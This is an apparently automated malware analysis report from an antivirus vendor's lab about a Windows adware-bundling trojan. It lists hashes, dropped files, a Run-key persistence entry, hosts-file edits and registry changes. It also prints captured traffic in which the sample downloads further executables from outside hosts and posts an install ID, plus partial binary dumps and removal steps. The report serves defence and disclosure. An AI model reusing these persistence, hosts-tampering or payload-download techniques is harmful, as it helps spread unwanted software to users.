Application.Bundler.Temonde.HT_e4a1e48948

by malwarelabrobot on March 19th, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Application.Bundler.Temonde.HT (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: e4a1e489480deb3f41e78f13b5c3a2b9
SHA1: fda732803fbc5629eb0aacac6c799c23d451d3ed
SHA256: db99cfe09b6e891097168754eac8fe8c39eb55d0f43f94e47d8ebf1b7e983510
SSDeep: 49152:3mlvp6tLWa5E8gu3vmXOTTWvqAhpu6xZgSqQ:
Size: 2353152 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: Igor Pavlov
Created at: 2017-02-19 12:13:02
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Application creates the following process(es):
No processes have been created.
The Application injects its code into the following process(es):

%original file name%.exe:3380
sM1ER3x0n9.exe:2924

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3380 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sM1ER3x0n9.exe (195092 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sM1ER3x0n9ENU9N67ZuZ.exe (67748 bytes)
C:\Windows\System32\drivers\etc\hosts (174 bytes)

The process sM1ER3x0n9.exe:2924 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (37 bytes)

Registry activity

The process %original file name%.exe:3380 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\CasterDate]
"date" = "18/03/2017"

[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\wewewe]
"partner" = "tuto"
"Product" = "diskpower"
"channel" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASMANCS]
"ConsoleTracingMask" = "4294901760"

The Application deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process sM1ER3x0n9.exe:2924 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\sM1ER3x0n9_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sM1ER3x0n9_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sM1ER3x0n9_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\sM1ER3x0n9_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sM1ER3x0n9_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sM1ER3x0n9_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sM1ER3x0n9_RASMANCS]
"EnableFileTracing" = "0"

To automatically run itself each time Windows is booted, the Application adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"XWK0O1HE6U" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sM1ER3x0n9.exe"

Dropped PE files

MD5	File path
8b21a1050fd7d0abd67916868ea28af0	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\sM1ER3x0n9.exe
62316e35da8eff3f8d6ac5eaa03f30f7	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\sM1ER3x0n9ENU9N67ZuZ.exe

HOSTS file anomalies

The Application modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 1038 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1	validation.sls.microsoft.com
127.0.0.1	cpm.paneladmin.pro
127.0.0.1	publisher.hmdiadmingate.xyz
127.0.0.1	distribution.hmdiadmingate.xyz
127.0.0.1	hmdicrewtracksystem.xyz
127.0.0.1	beautifllink.xyz

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Y
Product Name: YZOC06Z
Product Version: 2.6.8.4
Legal Copyright: Copyright (c) 9273
Legal Trademarks:
Original Filename: SxxW2X3.exe
Internal Name: SxxW2X3.exe
File Version: 2.6.8.4
File Description: YZOC06
Comments: YZOC06Z
Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	8192	2162880	2163200	4.1705	9e2824a1b5fc660e8e1f235dc2d074b5
.rsrc	2179072	188860	188928	3.23759	60324a0eefb7888e1ddb6315327fcf56
.reloc	2375680	12	512	0.070639	57c7d628ae673c1e75dc87c85be61e7d

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://asiasoftwaretools.com/get/3/wizzcaster_v2.exe	94.23.252.37
hxxp://wizzcaster.com/api/v5/config	188.165.209.131
hxxp://wizzcaster.com/api/v5/link	188.165.209.131
hxxp://asiasoftwaretools.com/get/4/remote.exe	94.23.252.37
teredo.ipv6.microsoft.com	157.56.106.189

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /get/4/remote.exe HTTP/1.1

Host: asiasoftwaretools.com


HTTP/1.1 200 OK

Date: Sat, 18 Mar 2017 19:21:38 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="remote.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
85800..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
....{.X.........."...0.................. ........@.. .................
...................@.....................................O............
......................................................................
.. ............... ..H............text........ ...................... 
..`.rsrc...............................@..@.reloc...............V.....
.........@..B........................H........#.......................
.............................................(....r...po...........%..
.o....&*..(....*.~....-.r...p.....(....o....s.........~....*.~....*...
....*.~....*..(....*Vs....(....t.........*......(....rW..po...........
%...o....&*..(....*v.o....rg..po......o....t....*..(....(....%-.r}..ps
....z.......%...o....&*.(....*j~....~.... ....(....( ...*...0..C......
.r...p(!.....~"...o#.........o$.....r...po.......&....o%....r...po....
. .....&....o%....r...po.......'....o%....r...po.......(....o%....r...
po.....(&....( ...o'.....*...%..,.o(.....( ....o%....r...po.....(&....
( ...o'.....*...%..,.o(.....( ....o%....r%..p~"...o)..........o....t..
....o*.....o ...(,....(&........io-...o'...*..0..k........( ....s.....
..(/........i.Yo0...........jo1.....s2.........io3...&...,..o4....(&..
..o'........,..o4......*.......7..E..........Q^.......0..3............
(....rE..po...........%...%.(.....o....&..&..*.........//......Vri..p.
....r...p.....*..BSJB............v2.0.50727......l...d...#~.......<<< skipped >>>

POST /api/v5/config HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: wizzcaster.com

Content-Length: 38

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue

....

uid=57a764d042bf8&days_after_install=0

HTTP/1.1 200 OK

Date: Sat, 18 Mar 2017 19:21:37 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

Set-Cookie: laravel_session=554085fc9d663d57b6f830d4b5de76b7c76d55fe; expires=Sat, 18-Mar-2017 21:21:37 GMT; Max-Age=7200; path=/; httponly

Content-Length: 28

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Sat, 18 Mar 2017 19
:21:37 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=554085fc9d663d57b6f830d4b5de76b7c76d55fe; e
xpires=Sat, 18-Mar-2017 21:21:37 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=5, max=100..Connection: Keep-A
live..Content-Type: text/html; charset=UTF-8..{"time_between_prints":"
15"}....


POST /api/v5/link HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: wizzcaster.com

Content-Length: 17

Expect: 100-continue

HTTP/1.1 100 Continue

....

uid=57a764d042bf8

HTTP/1.1 200 OK

Date: Sat, 18 Mar 2017 19:21:38 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

Set-Cookie: laravel_session=124abeb98d3c250b4e92a848832d22fd433263c2; expires=Sat, 18-Mar-2017 21:21:38 GMT; Max-Age=7200; path=/; httponly

Content-Length: 67

Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/bestoffersfortoday.com\/redirect\/57a764d042bf8"}HTT
P/1.1 200 OK..Date: Sat, 18 Mar 2017 19:21:38 GMT..Server: Apache/2.4.
10 (Debian)..Cache-Control: no-cache..Set-Cookie: laravel_session=124a
beb98d3c250b4e92a848832d22fd433263c2; expires=Sat, 18-Mar-2017 21:21:3
8 GMT; Max-Age=7200; path=/; httponly..Content-Length: 67..Content-Typ
e: text/html; charset=UTF-8..{"link":"http:\/\/bestoffersfortoday.com\
/redirect\/57a764d042bf8"}..

GET /get/3/wizzcaster_v2.exe HTTP/1.1

Host: asiasoftwaretools.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 18 Mar 2017 19:21:35 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzcaster_v2.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
1ad800..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L....{.X.........."...0..(...........F... ...`....@.. ................
.......@............@..................................E..O....`......
................. .......D............................................
... ............... ..H............text....&... ...(..................
 ..`.rsrc........`.......*..............@..@.reloc....... ............
..........@..B.................E......H........#... ...........C......
..............................................(....r...po...........%.
..o....&*..(....*.~....-.r...p.....(....o....s.........~....*.~....*..
.....*.~....*..(....*Vs....(....t.........*......(....rW..po..........
.%...o....&*..(....*v.o....rg..po......o....t....*..(....(....%-.r}..p
s....z.......%...o....&*.(....*j~....~.... ....(....( ...*...0..C.....
..r...p(!.....~"...o#.........o$.....r...po.......&....o%....r...po...
.. .....&....o%....r...po.......'....o%....r...po.......(....o%....r..
.po.....(&....( ...o'.....*...%..,.o(.....( ....o%....r...po.....(&...
.( ...o'.....*...%..,.o(.....( ....o%....r%..p~"...o)..........o....t.
.....o*.....o ...(,....(&........io-...o'...*..0..k........( ....s....
...(/........i.Yo0...........jo1.....s2.........io3...&...,..o4....(&.
...o'........,..o4......*.......7..E..........Q^.......0..3...........
.(....rE..po...........%...%.(.....o....&..&..*.........//......Vri..p
.....r...p.....*..BSJB............v2.0.50727......l...d...#~......<<< skipped >>>

The Application connects to the servers at the folowing location(s):

sM1ER3x0n9.exe_2924_rwx_00352000_00002000:

0646 6$6

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
Delete the original Application file.
Delete or disinfect the following files created/modified by the Application:

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sM1ER3x0n9.exe (195092 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sM1ER3x0n9ENU9N67ZuZ.exe (67748 bytes)
C:\Windows\System32\drivers\etc\hosts (174 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (37 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"XWK0O1HE6U" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sM1ER3x0n9.exe"
Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.